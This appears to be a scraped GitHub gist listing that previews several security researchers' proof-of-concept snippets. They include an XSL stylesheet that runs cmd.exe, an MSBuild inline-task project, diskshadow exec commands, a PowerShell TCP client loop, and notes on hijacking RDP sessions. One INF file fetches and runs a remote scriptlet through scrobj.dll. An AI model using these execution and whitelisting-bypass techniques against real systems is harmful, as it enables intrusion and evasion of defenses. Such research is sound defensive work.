This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RDP Eavesdropping and Hijacking | |
******************************* | |
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings | |
that is not very new... | |
=========== | |
Inspiration | |
=========== | |
As you may already know... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[InternetShortcut] | |
URL=file:///c:\windows\system32\calc.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; DRIVER.INF | |
; Copyright (c) Microsoft Corporation. All rights reserved. | |
[Version] | |
Signature = "$CHICAGO$" | |
Class=61883 | |
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} | |
Provider=%Msft% | |
DriverVer=06/21/2006,6.1.7600.16385 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[version] | |
signature="$CHICAGO$" | |
AdvancedINF=2.0 | |
[DefaultInstall.Windows7] | |
UnRegisterOCXs=FunRun | |
[FunRun] | |
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Execute | |
======= | |
*Interactive Mode | |
cmd.exe | |
c:\windows\system32\diskshadow.exe | |
> exec calc.exe | |
> exec "cmd.exe" /c calc.exe | |
> exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
file | |
StaticMetafile | |
StaticDib | |
clsid | |
objref | |
ADODB.Command.6.0 | |
ADODB.Parameter.6.0 | |
ADODB.Connection.6.0 | |
ADODB.Recordset.6.0 | |
ADODB.Error.6.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while ($true) { | |
$(Get-Date).ToUniversalTime() | |
$Runspace = [runspacefactory]::CreateRunspace() | |
$PowerShell = [powershell]::Create() | |
$PowerShell.runspace = $Runspace | |
$Runspace.Open() | |
[void]$PowerShell.AddScript({ | |
$tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
$tcpStream = $tcpConnection.GetStream() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |